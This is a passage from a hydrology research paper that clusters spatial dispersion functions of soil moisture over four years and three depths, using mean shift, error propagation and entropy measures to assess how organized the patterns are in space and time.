_{i,j}\\sqrt{|{z}_{t}\\left({x}_{i}\\right)-{z}_{t}\\left({x}_{j}\\right)|}\\right)}^{\\mathrm{4}}\\\\ & {\\left(\\mathrm{0.457}+\\frac{\\mathrm{0.494}}{N\\left(h\\right)}+\\frac{\\mathrm{0.045}}{{N}^{\\mathrm{2}}\\left(h\\right)}\\right)}^{-\\mathrm{1}},\\end{array}\\end{array}$\n\nfor each moving window position t with zt(xi,j) given by Eq. (1) for each pair of observation locations xi, xj. h is the separating distance lag between these point pairs and N(h) the number of point pairs formed at the given lag h. Ten classes were formed with a maximum separation distance of 1200 m2. The lag classes are not equidistant, but with a fixed N(h) for all classes. This is further discussed in Sect. 2.3.\n\n## 2.3 Clustering of dispersion functions\n\nWe analyzed how and whether meaningful spatial dispersion functions emerge and whether those converge into stable configurations. To tackle the hypotheses formulated in the introduction, a clustering is applied to the dispersion functions derived for each window. The clustering algorithm should form groups of functions that are more similar to each other than to members of other clusters. The similarity between two dispersion functions is calculated by the Euclidean vector distance between the dispersion values forming the function. This distance is defined by Eq. (3):\n\n$\\begin{array}{}\\text{(3)}& d\\left(\\mathbit{u},\\mathbit{v}\\right)=\\sqrt{\\left(\\mathbit{u}-\\mathbit{v}{\\right)}^{\\mathrm{2}}},\\end{array}$\n\nwith u, v being two dispersion function vectors. This is the Euclidean distance of two points in the (higher-dimensional) value space of the dispersion function's distance lags. Two identical dispersion functions are represented by the same point in this value space, and hence their distance is zero. Thus, distance lags are not equidistant, as this could lead to empty lag classes. Empty lag classes result in an undefined position in the value space, which has to be avoided. The clustering algorithm cannot use the number of clusters as a parameter, as this can hardly be determined a priori. One clustering algorithm meeting these requirements is the mean shift algorithm . The actual code implementation is taken from , which follows the variant of mean shift. A detailed description of the mean shift algorithm can be found in the Appendix (see Sect. A).\n\n## 2.4 Cluster compression based on the cluster centroids\n\nThe next step is to generate a representative dispersion function for each cluster. The straightforward representative function is the cluster centroid (the dispersion function closest to the point of highest cluster member density; see Sect. A for a detailed explanation). All dispersion functions are calculated with the same parameters, including the maximum separating distance of 1200 m. At larger lags we found instances of declining dispersion values, because we then paired points located on different hillslopes but otherwise in similar landscape units (i.e., same hillslope position or land use). To facilitate the comparison of the dispersion functions we decided to monotonize them. In geostatistics this is usually done through fitting of a theoretical variogram model to the experimental variogram, which ensures monotony and positive definiteness. Here we do not force a specific shape by a fitting a model function. Instead we use the technique of monotonizing the cluster centroid as suggested by using the PAVA algorithm . The implementation is from . This way the final compressed dispersion functions are monotonically increasing while still reflecting the shape properties of the cluster members. If dispersion functions are monotonically increasing, they also provide information about the characteristic length of the soil moisture pattern. Similarly to the semi-variogram in geostatistics, this characteristic length corresponds to the lag distance where the dispersion function reaches its first local maximum.\n\nWe suggest that the number of clusters needed to represent all observed spatial dispersion functions over a calendar year can be used as a measure of spatial organization (fewer clusters needed means a higher degree of organization, because dispersion functions are redundant in time). Additionally, it is insightful to judge the information loss that goes along with this compression, as a high compression with little information loss is understood as a manifestation of spatial and temporal organization of soil moisture dynamics.\n\nIn line with we use the Shannon entropy as a measure of the compression without information loss. It requires treatment of the clusters as discrete probability density functions, which in turn implies a careful selection of an appropriate classification of the data. Motivated by , we use the uncertainty in the dispersion function as a minimal class size for this classification, as described in Sect. 2.5.1.\n\n## 2.5 Uncertainty propagation and compression quality\n\n### 2.5.1 Uncertainty propagation\n\nSoil moisture measurements have a considerable measurement uncertainty of 1–3 cm3 cm−3 as reported by manufacturers. For our uncertainty propagation we assume an absolute uncertainty/measurement error Δθ of 0.02 cm3 cm−3.\n\nNext we propagate these uncertainties into the dispersion functions and the distances among those. As we assume the measurement uncertainties to be statistically independent, we use the Gaussian uncertainty propagation to calculate error bands/margins. In a general form, for any function f(z) and an absolute error Δz the propagated error Δf can be calculated. In our case z is itself a function of x, the observation location, and the general form is given by Eq. (4).\n\n$\\begin{array}{}\\text{(4)}& \\mathrm{\\Delta }f=\\sqrt{\\sum _{i=\\mathrm{1}}^{N}{\\left(\\frac{\\partial f}{\\partial z\\left({x}_{i}\\right)}\\mathrm{\\Delta }z\\left({x}_{i}\\right)\\right)}^{\\mathrm{2}}}\\end{array}$\n\nTo apply Eq. (4) for our method, the measurement uncertainty Δθ is propagated into the dispersion estimator given by Eq. (2). The dispersion estimator is derived with respect to z(x) and, following Eq. (1), the uncertainty in z(x), Δz, is denoted as $\\mathrm{\\Delta }z=\\mathrm{\\Delta }\\mathit{\\theta }=\\mathrm{0.02}$ cm3 cm−3. Then, with a given Δz, we can propagate the uncertainty into the dispersion function. As the dispersion function is a function of the spatial lag h, we need to propagate the uncertainty Δa (uncertainty of the dispersion estimator) for each value of h. At the same time, following Eq. (2), for each h, $z\\left({x}_{i}\\right)-z\\left({x}_{i}+h\\right)$ is a fixed set of point pairs. Instead of propagating uncertainty through Eq. (2), we can substitute $z\\left({x}_{i}\\right)-z\\left({x}_{i}+h\\right)$ by δ, the pairwise differences, for each value of h. The uncertainty Δδ is given by Eq. (5):\n\n$\\begin{array}{}\\text{(5)}& \\mathrm{\\Delta }\\mathit{\\delta }=\\sqrt{\\mathrm{\\Delta }{z}_{i}^{\\mathrm{2}}+\\mathrm{\\Delta }{z}_{i+h}^{\\mathrm{2}}}=\\sqrt{\\mathrm{2}}\\mathrm{\\Delta }z.\\end{array}$\n\nThe uncertainty of dispersion Δa is then defined by Eq. (6):\n\n$\\begin{array}{}\\text{(6)}& \\begin{array}{rl}\\mathrm{\\Delta }a& =\\frac{\\partial a}{\\partial \\mathit{\\delta }}\\mathrm{\\Delta }\\mathit{\\delta }\\\\ & =\\mathrm{2}c{\\left(\\frac{\\mathrm{1}}{N}\\sum _{i=\\mathrm{1}}^{N}{\\left(|{\\mathit{\\delta }}_{i}|\\right)}^{\\frac{\\mathrm{1}}{\\mathrm{2}}}\\right)}^{\\mathrm{3}}\\cdot \\frac{\\mathrm{1}}{N}{\\left(\\sum _{i=\\mathrm{1}}^{N}|{\\mathit{\\delta }}_{i}{|}^{-\\mathrm{1}}\\right)}^{\\frac{\\mathrm{1}}{\\mathrm{2}}}\\cdot \\mathrm{\\Delta }\\mathit{\\delta },\\end{array}\\end{array}$\n\nwhere the factors from Eq. (2) that stay constant in the derivative are denoted as c and defined in Eq. (7). In line with Eq. (2) N is the number of observation pairs available for a given lag class h and therefore constant for a single calculation. Δδ and δ are the substitutes for z, as described above (see Eq. 5).\n\n$\\begin{array}{}\\text{(7)}& c=\\frac{\\mathrm{1}}{\\mathrm{2}}\\cdot {\\left(\\mathrm{0.457}+\\frac{\\mathrm{1}}{N}+\\frac{\\mathrm{0.045}}{{N}^{\\mathrm{2}}}\\right)}^{-\\mathrm{1}}\\end{array}$\n\nThe last step is to propagate the uncertainty into the distance function as defined in Eq. (3). The Euclidean distance is used as a measure of proximity by mean shift, as it groups dispersion functions at short distances together (for more details, see Sect. A). At the same time, we use the uncertainty propagated into the Euclidean distance between two dispersion functions to assess compression quality (as further described in Sect. 2.5.2). Following Eq. (4) the propagated uncertainty Δd can be calculated by the derivative of Eq. (3) with respect to each of the vectors multiplied by the corresponding value of Δa, which results in Eq. (8):\n\n$\\begin{array}{}\\text{(8)}& \\begin{array}{rl}& \\mathrm{\\Delta }{d}_{\\mathbit{u},\\mathbit{v}}=\\sqrt{{\\left(\\frac{\\partial d}{\\partial \\mathbit{u}}\\mathbf{\\Delta }\\mathbit{u}\\right)}^{\\mathrm{2}}+{\\left(\\frac{\\partial d}{\\partial \\mathbit{u}}\\mathbf{\\Delta }\\mathbit{u}\\right)}^{\\mathrm{2}}}\\\\ & =\\sqrt{\\frac{\\mathrm{1}}{\\mathrm{2}}\\sum _{i=\\mathrm{1}}^{n}\\left(|\\mathbit{u}-\\mathbit{v}{|}^{\\frac{\\mathrm{1}}{\\mathrm{2}}}\\right)\\sum _{i=\\mathrm{1}}^{n}\\left({\\left(\\mathrm{2}\\left(|{\\mathbit{u}}_{i}-{\\mathbit{v}}_{i}|\\right)\\mathrm{\\Delta }{\\mathbit{u}}_{i}\\right)}^{\\mathrm{2}}+{\\left(\\mathrm{2}\\left(|{\\mathbit{u}}_{i}-{\\mathbit{v}}_{i}|\\right)\\mathrm{\\Delta }{\\mathbit{v}}_{i}\\right)}^{\\mathrm{2}}\\right)},\\end{array}\\end{array}$\n\nwhere u, v are two spatial dispersion function vectors as defined and used in Eq. (3). Δu,Δv are the vectors of uncertainties for u, v, where Δvi is the uncertainty propagated into the ith lag class as shown in Eq. (6). n is the number of lag classes and thus the length of each vector u, v, ΔuΔv.\n\nEquation (8) is applied to all possible combinations of dispersion functions u, v to get all possible uncertainties in dispersion function distances.\n\n### 2.5.2 Compression quality\n\nThe Shannon entropy (Shannon1948) of all pairwise dispersion function distances is used as a measure of information content. The Shannon entropy of a discrete probability density function of states (patterns in this case) is maximized for the uniform distribution. It corresponds to the number of yes/no questions one has to ask to determine the state of a system. The minimum entropy is zero, which corresponds to the deterministic case where the system state is always known. A common way to define spatial organization of a physical system is through its distance from the maximum entropy state . The deviation of the entropy of the dispersion functions in a cluster from its maximum value is thus a measure of their redundancy and thus similarity.\n\nFor a discrete frequency distribution of n bins, the information entropy H is defined as\n\n$\\begin{array}{}\\text{(9)}& H=-\\sum _{n}{p}_{n}{\\mathrm{log}}_{\\mathrm{2}}\\left({p}_{n}\\right),\\end{array}$\n\nwhere pn is the relative probability of the nth bin. H is calculated for each depth in each year individually to compare the information content across years and depths. Note that the term bin is also used in the literature to refer to the binning of pairwise data, e.g., in geostatistics. For this kind of binning, although technically the same thing, we used the term lag classes here to distinguish it from the binning as shown in Eq. (9). Thus, when we write bin or binning we refer to the classification of distances between dispersion functions, not observation points.\n\nTo ensure comparability, we use one binning for all calculations of H (across years and depths). To achieve this, all pairwise distances between all spatial dispersion functions of all 4 years in all three depths are calculated. The discrete frequency distribution is formed from 0 up to the global maximum distance (between two dispersion functions) calculated using Eq. (3). The bins are formed equidistantly using a width of the maximum function distance that still lies within the error margins calculated using Eq. (8). Thus, the information content of the spatial heterogeneity is calculated with respect to the expected uncertainties. This way we can be sure to distinguish exclusively those spatial dispersion functions that lie outside of the error margins.\n\nThe Kullback–Leibler divergence is a measure of the difference between two empirical, discrete probability distributions. Usually, one distribution is considered to be the population and the other one a sample from it. The Kullback–Leibler divergence DKL then quantifies the uncertainty introduced (e.g., in an statistical model) using a sample as a substitute for the population.\n\nWe use the Kullback–Leibler divergence to measure and quantify the information loss due to compression. To compress the series of dispersion functions, each cluster member is expressed by its centroid function. Now, we need to calculate the amount of information lost in this process. To calculate the mean information content of the compressed series, each cluster member is substituted by the respective cluster centroid. This substitution is obviously not a compression in a technical sense, but it is necessary to calculate the Kullback–Leibler divergence. Then a frequency distribution for the compressed series X and the uncompressed series Y can be calculated. The Kullback–Leibler divergence DKL of XY is given in Eq. (10):\n\n$\\begin{array}{}\\text{(10)}& {D}_{\\mathrm{KL}}\\left(X,Y\\right)=H\\left(X||Y\\right)-H\\left(Y\\right),\\end{array}$\n\nwhere $H\\left(X||Y\\right)$ is the cross entropy of X and Y and defined by Eq. (11):\n\n$\\begin{array}{}\\text{(11)}& H\\left(X||Y\\right)=\\sum _{x\\in X}p\\left(x\\right)\\cdot {\\mathrm{log}}_{\\mathrm{2}}p\\left(y\\right),\\end{array}$\n\nwhere p(x) is the empirical non-exceedance probability of the frequency distribution X and p(y) of Y, respectively.\n\n3 Results\n\n## 3.1 Dispersion functions over time\n\nFigure 3a shows the spatial dispersion functions for all moving window positions in 2016 for the 30 cm sensors. The position of the moving window in time can be retraced by the line color: darker red means a later Julian day. Each of the spatial dispersion functions relates the dispersion for all pairwise observations to their separating distance in the corresponding lag class. Dispersion increases with separating distance, as small values correspond to observations which have similar values, while large values suggest the opposite. As expected, the dispersion is a suitable metric for similarity/dependency of observations.",
null,
"Figure 3Spatial dispersion functions in 30 cm for 2016 based on a window size of 30 d. (a) Spatial dispersion function for each position of the moving window. The red color saturation indicates the window position. The darker the red, the later in the year. (b) The same dispersion functions as presented in (a). Here the color indicates cluster membership as identified by the mean shift algorithm. (c) Compressed spatial dispersion information represented by corrected cluster centroids. The colors match the clusters as presented in (b). (d) Soil moisture time series of 2016 in 30 cm depth. The colors identify the cluster membership of the spatial dispersion function of the current window location and match the colors in (b) and (c). The bars on the top show the daily precipitation sums. The solid blue line is the cumulative daily precipitation sum and the red line the cumulative sum of all mean daily temperatures > 5 C. The green bar marks the assumed vegetation period. It covers the dates where the cumulative day-degree sum is >15 % and <90 % of the maximum.\n\nThe spatial dispersion functions take several distinct shapes, with each of these shapes occurring during a certain period in time. More specifically, from Fig. 3a one can identify groups of functions of similar reds plotting close to each other. Dispersion functions of similar red saturation, which reflects proximity in time, are also similar in shape, and this in turn reflects similar spatial patterns. Similar dispersion functions were grouped using the mean shift clustering algorithm (Fig. 3b); here, the color indicates the cluster membership.\n\nTo provide further insight into the temporal occurrence of cluster members, we colored the soil moisture time series according to the color codes of the identified clusters (Fig. 3d). The blue parts of the soil moisture time series were classified into Cluster no. 1, while the orange part was classified into Cluster no. 2. Note that cluster memberships are constant for long periods of time, which means that the soil moisture patterns are also persistent over these periods. Exact cluster lifespans can be found in Table B1. We could identify four clusters in 30 cm, with the orange cluster roughly occurring during the vegetation period and the other three the remaining time of the year. As new observations did not change the patterns during these periods, they were redundant in time.\n\nAs the spatial dispersion functions in the presented example are redundant in time, we compressed the information by replacing the dispersion function within one cluster by the cluster centroid. All four representative functions shown in Fig. 3c exhibit increasing dispersion with separating distance. For the blue and green clusters this happens step-wise at a characteristic distance of 500 m. That reminds us of a Gaussian variogram, which can also show a step-wise characteristic. The small grey cluster shows an increase at 500 and another one at 1000 m separating distance. In contrast, the orange cluster, however, shows only a gentle increase with distance.\n\nIn the vegetation period observations are similar even at large separating distances. Interestingly, dispersion functions in the orange cluster start with small values that only gently increase with separating distance. That means soil moisture becomes more homogeneous. Outside of the vegetation period, different spatial patterns can be observed, with increasing dissimilarity with separating distances. The part of the blue cluster overlapping with the vegetation period shows still higher soil moisture values. The transition to the orange cluster sets in as the soil moisture drops (Fig. 3d). This suggests that vegetation influences, such as root water uptake, smooth out variability in soil water content, leading to a more homogeneous pattern in space, as further discussed in Sect. 4.3.\n\n## 3.2 Dispersion time series as a function of depth\n\nFigure 4 shows the time series of the dispersion functions for all depths. Note that the coloring between the sub-figure is arbitrary, due to mean shift, which means there is no connection between the orange cluster between the three figures.",
null,
"Figure 4Soil moisture time series of 2016 in all three depths with respective cluster centroids. The three rows show the data from 10 cm (a), 30 cm (b) and 50 cm (c). The colors indicate the cluster membership of the corresponding dispersion function of the respective window position. The green bar marks the assumed vegetation period. It covers the dates where the cumulative day-degree sum is >15 % and <90 % of the maximum. The cluster centroids for each depth are shown in (d–f).\n\nIn comparison to the dispersion functions in 30 cm (Fig. 4b) the soil moisture signal in 10 cm (Fig. 4a) is more variable in time. A look at the centroid of the orange cluster (Fig. 4d) reveals a higher spatial heterogeneity in winter and spring at large separating distances. At the same time the observations get spatially more homogeneous in summer, particularly when the blue cluster emerges; i.e., the dispersion at large lags decreases significantly. We can still find a summer-recession cluster in 10 cm, but compared to the depth of 30 cm we also find this spatial footprint of continuous drying earlier in the year around May. This is likely due to a higher sensitivity to rising temperatures. Note that during May there was only little rainfall and the soil moisture is already declining. This blue cluster shows very small dispersion values for all separating distance classes (Fig. 4d), just as the orange cluster in 30 cm depth.\n\nThe green clusters emerge with strong rainfall events after longer previous dry spells (Fig. 4a and d). We would have expected a third occurrence at the beginning of August, but the soil may already be too dry to bear a detectable dependency on separating distance (remember that the blue cluster does not show increasing dispersion with distance).\n\nObservations at 50 cm depth show a clear spatial dependency throughout the whole year. We cannot identify a summer cluster, mean shift yielded two clusters and rainfall forcing does not have a clear influence on their occurrence or transition. The two 50 cm dispersion functions (Fig. 4f) show a clear dependence on distance, but they differ in their dispersion value at large lags. At 10 and 30 cm we found dispersion functions of fundamentally different shapes, like the flat, blue function (Fig. 4,d) or the step-wise blue and green functions (Fig. 4e). At 50 cm depth the characteristic length is 500 m and the blue cluster persists throughout most of the year (282 d; see Table B1). The orange cluster occurs during the cool and wet start of the year, showing a larger dispersion and thus stronger dissimilarity at larger lags (Fig. 4f). Interestingly this cluster occurs again in early June after an intense rainfall period. However, a similar rainfall period in August does not trigger the emergence of this orange cluster as the topsoil above 50 cm is so dry, so that even this strong wetting signal does not reach the depth of 50 cm (Fig. 4c). This behavior reveals the low-pass behavior of the topsoil, which causes a strong decoupling of the soil moisture pattern at 50 cm depth from event-scale changes.\n\n## 3.3 Recurring spatial dispersion over the years\n\nTable 1 summarizes the most important features of the clustering for all observation depths. Soil moisture patterns and their clustering appear generally to be clearer for 2015 and 2016. The vegetation period is more often characterized by a typical cluster and dispersion functions more often reveal a clear spatial dependency. In some cases (10 cm, 2013 and 2014) no spatial dependency of dispersion functions could be observed throughout the whole year. Less clusters were formed in 2015 and 2016. Note that annual rainfall sums were higher in 2013 and 2014, while 2015 and 2016 had significantly more precipitation in the first half of the year, followed by a dry summer (compared to 2013 and 2014).\n\nTable 1Qualitative description of method success in all years and depths. The results from years other than 2016 and all depths were inspected visually and are summarized here for the sake of completeness. The first three columns identify the year, sensor depth and number of clusters found by mean shift. The remaining three columns state whether specific features existed in the given result. Vegetation period marks whether or not the vegetation period was characterized by a single, or two, clusters. Spatial structure: does a dependency of dispersion on distance exist outside the vegetation period? Rainfall transition: were cluster transitions accompanied by a rainfall event in close (temporal) proximity? This feature is marked “yes” if it was more often the case than it was not.",
null,
"To further illuminate interannual changes in soil moisture patterns, we present the time series of cluster memberships for the sensors in 30 cm for the entire monitoring period in Fig. 5. From this example it becomes obvious that patterns are recurring. Years 2013 and 2014 cluster centroids look different from the following 2 years. Dispersion values increase with distance in all centroids in 2013 and 2014, while 2015 and 2016 show a sudden increase at 400–500 m (Fig. 5a–d). Years 2015 and 2016 are segmented by mean shift in a similar way, and cluster centroids reveal that the green clusters in both years are actually the same. This green cluster emerges with the occurrence of the largest rainfall event in the observation period and lasts for around 5 months. All dispersion functions within this cluster look nearly identical (see Fig. C2b). Similar observations can be made between 2014 and 2015. Here, the green and blue clusters seem to be an interannual cluster. However, in contrast to 2015/2016, the dispersion functions here are of a different shape (see Fig. C1b). Hence, the cluster transition indicated between 2014 and 2015 is indeed a real transition. When looking at cluster memberships throughout the whole period, the division into calendar years is rather meaningless, while the division into hydrological years is much more appropriate, as is reflected by the cluster membership and its changes.",
null,
"Figure 5Soil moisture time series of all years in 30 cm depth (e) and the respective cluster centroids (a–d). The colors of the soil moisture data indicate the cluster membership of the corresponding dispersion function of the respective window position and correspond to the color of the cluster centroid (in a–d). The cumulative rainfalls (blue) and cumulative temperature sums (red) are shown for each year individually. The green bar marks the assumed vegetation period. It covers the dates where the cumulative day-degree sum is >15 % and <90 % of the maximum.\n\nDistinct summer recessions in soil moisture are only identified in 2015 and 2016. Evapotranspiration (indicated by the cumulative temperature curves in Fig. 5e) dominates over rainfall input (blue sum curve) in the soil moisture signal. Mean shift could identify a significantly distinct spatial dependency in dispersion, as shown by the two orange centroids in Fig. 5c and d. They are both distinct from the other centroids in the same period by showing only a gentle increase in dispersion. A likely reason for the absence of a distinct summer recession in 2014 is the rather wet and cold spring and summer, as can be seen from the steep cumulative rainfall curve during that period (Fig. 5e). In 2013 this identification did not work. Possible reasons are provided in the discussion Sect. 4.5.\n\n## 3.4 Redundant spatial dispersion functions\n\nWe calculated the Shannon entropy for all soil moisture time series for all years and depths (Table 2). As explained in Sect. 2.5.2 this reflects the intrinsic uncertainty of the clusters. Most entropy values are within a range of $\\mathrm{1}. The maximum possible entropy for a uniform distribution of the used binning is 3.55. The Kullback–Leibler divergence DKL is a measure of the information loss due to the compression of the cluster onto the centroid dispersion function. In the overwhelming majority of the cases, the information loss is 1 magnitude smaller than the intrinsic uncertainty and the range is $\\mathrm{0.01}<{D}_{\\mathrm{KL}}<\\mathrm{0.4}$. Hence, the information loss due to compression is negligible. There is one exception in 2016 (50 cm).\n\nTable 2Information content and information loss due to compression. The information content is given as Shannon entropy H, which is the expectation value of information in information theory. 2H gives the number of distinct states the underlying distribution can resolve. The information loss after compression is given by the Kullback–Leibler divergence DKL between the compressed and uncompressed series of dispersion functions. The last column relates DKL to H.",
null,
"The clusters obtained in 30 cm for the year 2016 (compare Sect. 3.1) showed an entropy of 1.44. Compared to this value, the Kullback–Leibler divergence caused by compression of only 0.02 is small, if not negligible. The last column of Table 2 relates DKL to the overall uncertainty. It contributes less than one-third in almost all cases (2016; 50 cm is the only exception). In the majority of the cases it does not contribute more than 20 %.\n\nAccording to Eq. (9) the Shannon entropy is derived from a discrete, empirical probability distribution. As it is calculated using the binary logarithm, 2H gives the amount of discriminable states in this discrete distribution. This number of states is deemed to be a reasonable upper limit for the number of clusters for mean shift. A higher number of clusters than 2H appears meaningless, and this ensures that only those clusters are separated which are separated by a distance larger than the margin of uncertainty.\n\n4 Discussion\n\nIn line with our central hypothesis H1 – that radiation-driven drying and rainfall-driven wetting leave different fingerprints in the soil moisture pattern which manifests in temporal changes in the dispersion functions – we found strong evidence that soil water dynamics is organized in space and time. Our findings reveal that this organization is not static but exhibits dynamic changes which are closely related to seasonal changes in forcing regimes. A direct consequence is that soil moisture observations are quite predictable in time despite their strong spatial heterogeneity. This is in line with conclusions of, e.g., or , who also found characteristic spatial patterns to persist in time. We used the statistical dispersion of soil moisture observations in dependence of their separating distance to describe spatial patterns. The vector distance of these dispersion functions was used to cluster them. As a measure of the degree of organization we used the information loss that goes along with the compression of the entire cluster, i.e., the replacement of the cluster by the most representative cluster member. Here we found that this compression adds negligible uncertainty compared to the intrinsic uncertainty, caused by propagation of measurement uncertainties. We thus conclude that soil moisture is heterogeneous but temporally persistent over several months.\n\nIn the following we will discuss our main findings that similarity in space leads to dynamic similarity in time, the way we utilized the measurement uncertainty to determine the information content and how two different processes forcing soil moisture dynamics induce two fundamentally different spatial patterns.\n\n## 4.1 Spatial similarity persists in time\n\nWe related the dispersion of pairwise point observations to their separating distance. For brevity and due to their shape we called these relationships dispersion functions. We emphasize that this term is not meant in a strict sense, and no mathematical functional relationship, analogous to a theoretical model, has been fitted to the experimental dispersion functions. Despite the fact that the presented functions are empirical, they show clear, recurrent shapes on many occasions.\n\nWe found spatial similarity to persist in time. This is reflected in the temporal stability in cluster membership. In line with H2 – that both forcing regimes and their seasonal variability may be identified through temporal clustering of dispersion functions – the results (Figs. 35) provided evidence that similar dispersion functions emerge in fact very closely in time. Generally they appeared in continuous periods or blocks in time and their changes coincided with changes or a switch in the forcing regimes. In case we can relate the emergence of such a cluster more quantitatively to the nature and strength of a specific forcing event/process, we can analyze for how long this event/process imprints the spatial pattern of soil moisture observations. Or in other words: we can analyze how long a catchment state remembers a disturbance. However, an attempt to relate cluster transitions to rainfall sums and frequencies within the respective moving windows (see Fig. B1) did not yield clear dependencies.\n\nAlthough cluster memberships occur in temporally continuous blocks in all depths throughout all years, for a few cases we could not relate their emergence to distinct changes in forcing. This implies that H2 needs to be partly revised.\n\nDispersion functions in 50 cm show a clear spatial dependency throughout the year, with distinct differences within and outside the vegetation period. In 50 cm of 2016 this is different. We find essentially two clusters that do not separate the data series by vegetation period. The shape of the two centroids (Fig. 4f) is similar, only at large distances they differ in value. This means that from the orange to blue clusters observations became more similar at large separating distances. Heavy rainfall disturbs this pattern leading to stronger dissimilarity at larger distances and that pattern lasted for a couple of weeks. Then, evapotranspiration-driven drying smooths out soil moisture variability and during a similarly strong rainfall event in summer, the cluster can not emerge again as the soil is already too dry. The soil acts as a low-pass filter here, which filters out any change in state above a specific frequency. This happens mainly due to dispersion of the infiltrating and percolating water through the soil, or due to storage in the soil matrix. By the time it reaches the deep layers, spatial differences are eliminated. This kind of behaviour is well known and was already reported in the early 1990s . More recently “found large variations in spatial soil moisture patterns in the topsoil, mostly related to meteorological forcing. In the subsoil, temporal dynamics were diminished due to soil water redistribution processes and root water uptake”. In the same year, analyzed a data set of 106 locations in a forested catchment in the US for spatial organization in soil moisture patterns. They found a seasonal change in more shallow depths (30 cm), controlled by rainfall and evapotranspiration. In deeper depths patterns became more temporally persistent. All these findings are in line with our results and conclusions.\n\ndecomposed a long-term (15-month) soil moisture time series into time-invariant and dynamic contributions to the spatial variance. Their data set spanned 14 sites from Switzerland at a clearly different scale (150×210 km). The study quantified the time-invariant contribution on average to 94 %, which leads to “a smaller spatial variability of the temporal dynamics than possibly inferred from the spatial variability of the mean soil moisture” (Mittelbach and Seneviratne2012, p. 2177, l. 14 ff.). This is comparable to the instances where we find long-lasting clusters, while the absolute soil moisture changes considerably (e.g., Fig. 3d), early April or mid-July).\n\n## 4.2 Uncertainty analysis\n\nWe related the evaluation of compression quality directly to the measurement uncertainty. This was achieved by Gaussian error propagation of measurement uncertainty into the dispersion functions and their distances. The latter allowed definition of a minimum separable vector distance between two dispersion functions that are different with respect to the error margin. We based the bin width for calculating the Shannon entropy on this minimum distance, because this ensured that the Shannon entropy gives the information content of each cluster with respect to the uncertainty. On this basis it was possible to assess compression quality not only by the number of meaningful clusters found, but also based on the information lost due to compression with respect to uncertainty.\n\nIn line with H4, spatial patterns of soil moisture were found to be persistent over weeks, if not months. In many instances we found only two to four clusters within 1 year, and compression was possible with small if not negligible information loss. That means that during one cluster period an entire set of dispersion functions does not contain substantially more information than the centroid function. Hence, the whole cluster can be represented by only the centroid function. We conclude that this is a manifestation of a strongly organized state which persists for a considerable time, as most observations were redundant during these periods.\n\nconcluded that picking a random soil moisture observation location and deriving the temporal dynamics from this single sensor is more accurate than using the spatial mean of many soil moisture time series. This conclusion was true for all three data sets they tested . This representativity of a single sensor to our understanding is a manifestation of a persistent spatial pattern in soil moisture dynamics, which also enables us to compress clusters without information loss.\n\nFrom Eq. (9) it can be seen that the Shannon entropy changes substantially with the binning. Therefore, it is of crucial importance to define a meaningful binning based on objective criteria. We suggest that only a discrimination into bins larger than the error margins makes sense, because smaller differences cannot be resolved based on the precision of the sensors. For the application presented in this work, this is important because otherwise one could not compare the compression quality between depths or years, as different binnings lead to different Shannon entropy values, even for the same data. Hence, it would be difficult to analyze effects or differences of spatial dispersion in depth or over the years. We thus conclude that the Shannon entropy should only be used if the measurement uncertainties of the data are properly propagated.\n\nWe provided an example of how the quality of a compression can be assessed. Instead of considering the number of clusters (compression rate) only, we linked the compression rate to the resulting information loss. We could show that in the majority of the cases substantial compression rates could be achieved, which are accompanied by negligible information losses. We thus suggest that the trade-off between compression rate and information loss should be used as a compression quality measure.\n\n## 4.3 Different dominant processes lead to different patterns\n\nOutside of the vegetation period, we found a recurring picture of spatial dispersion functions with characteristic lengths clearly smaller than the typical extent of hillslopes. Dispersion functions were calculated in three depths for every day throughout 4 years. In most cases there is an characteristic length at which the dispersion function shows a sudden rise in dispersion. For spatial lags smaller than this distance the dispersion is usually very small. Higher lags show much higher and more variable dispersion values. This characteristic length is approx. 500 m. This corresponds to a common hillslope length for the Colpach catchment. During the vegetation period variability at a large separating distance was smoothed out. Dispersion was low also at large distances, suggesting similarity even at distances larger than the typical slope length. We thus conclude that there is dependence of the dispersion on the rainfall pattern, which is reflected in the dispersion function's shape and characteristic length. This confirms H2 and suggests that vegetation is a possible dominant factor in smoothing out soil moisture variability. A similar conclusion is drawn by , who identified “preferred states in soil moisture” and could relate the state transition to a significant change in the characteristic length of their geostatistical analysis. We generally found more than two clusters, but we still consider these results to be comparable. Most of the clusters identified during the vegetation period are more similar to each other than to the clusters outside of the vegetation period (and vice versa). This can be related to the “wet” and “dry” states in . Although conducted in a very different climate, also widened the separation of two preferred states into five, which they found to be explanatory for runoff generation. Interestingly they found the seasonal interplay of precipitation and evapotranspiration responsible for transitions between states. further reference as an example study, which identified vegetation as the dominant factor. Plant root activity is changing the temporal stability of soil moisture in the upper 20 cm of the soil considerably.\n\nOutside the vegetation period we observed multiple cluster transitions. Although more than one cluster was identified, the clusters were more similar in shape to each other than to the clusters in the “dry” summer period. In many cases these cluster transitions coincided with a shift in rainfall regimes. Either the first stronger rainfall event after a longer period without rainfall sets in, or one of the heaviest rainfall events of that year occurs. There are also instances with recurring clusters that develop more than once (e.g., Figs. 3, 4a, c and 5e). As these periods are controlled by rainfall, either different rainfall patterns or different hydrological processes are dominating. Depending on antecedent wetness, rainfall amounts and rainfall intensity, infiltration and subsurface flow processes can change and thus also alter the soil moisture pattern. Although this may only be a coincidence, we found the green cluster in 2016 (Fig. 3) to form with strong rainfall input setting in after a period of little rainfall. Similar observations can be made for other years, unfortunately not in all cases. Consequently, we can neither confirm nor reject H3 – that spatial dispersion is more pronounced during and shortly after rainfall-driven wetting conditions.\n\nMany other works also tried to link soil moisture pattern to forcing. report for soil moisture measurements taken on an agricultural field in Belgium that the first rainfall events in the late growing season even out the variability, which arose due to heterogeneous transpiration. Although the soil moisture pattern became more homogeneous in summer in our case, we also suspect rainfall events after the vegetation period to be responsible for cluster transitions. Similarly, present a set of examples of modeled experiments, in which precipitation is consistently “producing” variability in soil moisture dynamics and transpiration is reducing variability. The question of how spatial patterns or their variability change is also contradictory in the literature. present two studies in their review. Both investigated the variability of time-persistent soil moisture patterns over depth. While found no difference in depth, reported a decrease in variability with depth. During the vegetation period no spatial dependence is detectable. For the vegetation period, we found usually only one or at maximum two clusters (Table 2). These clusters are characterized by showing no dependence of dispersion on separating distance. This means that evapotranspiration forcing the system to drier states is doing this in a (spatially) homogeneous manner. Dispersion is not only low when the catchment is dry, it is also low while the system is drying. Similar observations have been reported for the Tarrawarra catchment in Australia . Although these works focused on the relation of spatial organization to topographic indices, no spatial correlation of soil moisture observations could be found for the dry period. This is comparable to our findings about dispersion functions during the vegetation period. It has to be noted that the lowest soil moisture values, i.e., residual moisture, are only observed for very short periods in time. At residual soil moisture all sensors show essentially the same absolute value (which leads to small dispersion as 